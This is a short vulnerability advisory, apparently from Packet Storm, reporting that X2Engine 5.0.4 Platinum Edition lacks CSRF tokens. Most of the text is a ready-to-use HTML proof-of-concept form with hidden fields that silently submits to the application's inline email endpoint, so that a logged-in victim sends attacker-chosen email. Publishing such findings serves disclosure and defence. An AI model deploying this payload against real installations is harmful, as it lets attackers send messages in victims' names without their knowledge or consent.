X2Engine version 5.0.4 Platinum Edition suffers from a cross site request forgery vulnerability.
f6273835fcbc357b84db088dd67b35d761e655a071f007034509965aad09b06b# Affected software: x2 engine
# Type of vulnerability: csrf
# URL: http://demo.x2engine.com
# Discovered by: Provensec
# Website: http://www.provensec.com
#version :*X2Engine 5.0.4 Platinum Edition*
# Proof of concept
x2 engine was not using any csrf token which causes a csrf issue which an
attacker can use to send emails
<html>
<body>
<form action="
http://demo.x2engine.com/index.php/emailInboxes/inlineEmail?ajax=1&postReplace=0&contactFlag=1&skipEvent=0"
method="POST">
<input type="hidden" name="InlineEmail[modelId]" value="" />
<input type="hidden" name="associationType" value="EmailInboxes" />
<input type="hidden" name="InlineEmail[modelName]" value="" />
<input type="hidden" name="contactFlag" value="1" />
<input type="hidden" name="InlineEmail[credId]" value="1" />
<input type="hidden" name="InlineEmail[to]"
value="test@tes" />
<input type="hidden" name="InlineEmail[cc]" value="" />
<input type="hidden" name="InlineEmail[bcc]" value="" />
<input type="hidden" name="InlineEmail[subject]"
value="test@tes" />
<input type="hidden" name="InlineEmail[message]"
value="test@tes" />
<input type="hidden"
name="InlineEmail[emailInboxesEmailSync]" value="0" />
<input type="hidden"
name="InlineEmail[emailInboxesEmailSync]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed